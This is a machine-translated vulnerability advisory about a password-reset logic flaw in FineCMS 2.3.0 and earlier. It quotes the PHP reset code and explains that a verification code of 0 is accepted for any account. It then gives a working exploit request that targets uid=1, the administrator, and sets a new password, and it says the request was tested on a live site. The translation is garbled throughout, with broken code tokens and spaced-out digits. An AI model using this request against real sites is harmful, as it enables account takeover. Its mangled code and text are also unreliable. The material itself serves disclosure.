finecms <= 2.3.0 arbitrary User Password Change-bug-warning-the black bar safety net

2016-03-04T00:00:00
ID MYHACK58:62201672166
Type myhack58
Reporter 佚名
Modified 2016-03-04T00:00:00

Description

Impact version 1 4 4 1 8 Number Update 2. 3. 0 and previous versions. The latest version does not have this problem.

Clouds explosion over a<http://www.wooyun.org/bugs/wooyun-2014-060197> the use of violence to crack the code a way to reset the password, here the manner discussed with respect to the brute-force to lower costs.

Looking directly at the code to verify the CAPTCHA logic: a logical analysis download comments.

case 2:

$uid = (int)$this->input->get('uid'); $code = (int)$this->input->post('code'); From post get the verification code. $data = $this->db ->where('uid', $uid) ->where('randcode', $code) According to the code and UID from the database query the data. ->select('salt,uid,username,email') ->limit(1) ->get('member') ->row_array(); if (!$ data) { If you can not find the code corresponding to the data error. $this->member_msg(lang('m-0 0 0')); }

$password1 = $this->input->post('password1'); $password2 = $this->input->post('password2'); if ($password1 != $password2) { $error = lang('m-0 1 9'); } elseif (!$ password1) { $error = lang('m-0 1 8'); } else { // Change the password $this->db ->where('uid', $data['uid']) ->update('member', array( Successfully modified the password after the CAPTCHA randcode set to 0!!!!! 'randcode' => 0, 'password' => md5(md5($password1).$ data['salt']. md5($password1)) )); if ($this->get_cache('MEMBER', 'setting', 'ucenter')) { uc_user_edit($data['username'], ", $password1, ", 1); } $this->member_msg(lang('m-0 5 2'), dr_url('login/index'), 1); } break; } }

Here a logical question is, modify the password after the CAPTCHA is set to zero. Go to the database to see it, this field's default value is 0, and determines the verification code before the code whether it is 0 is judged. Lead to the use of 0 as the code can directly modify any account password. In this way the black box of any of the password-reset case and not see through. ! [](http://xdxd.love/images/finecms5.jpg)

Use way, directly to the post url:

http://www.xxxxxxx.com/member/index.php?c=login&m=find&step=2&uid=1

Where uid=1 as administrator. post data for code=0&password1=1 2 3 4 5 6 7 8&password2=1 2 3 4 5 6 7 8 In the Internet example test.

! [](http://xdxd.love/images/finecms6.jpg)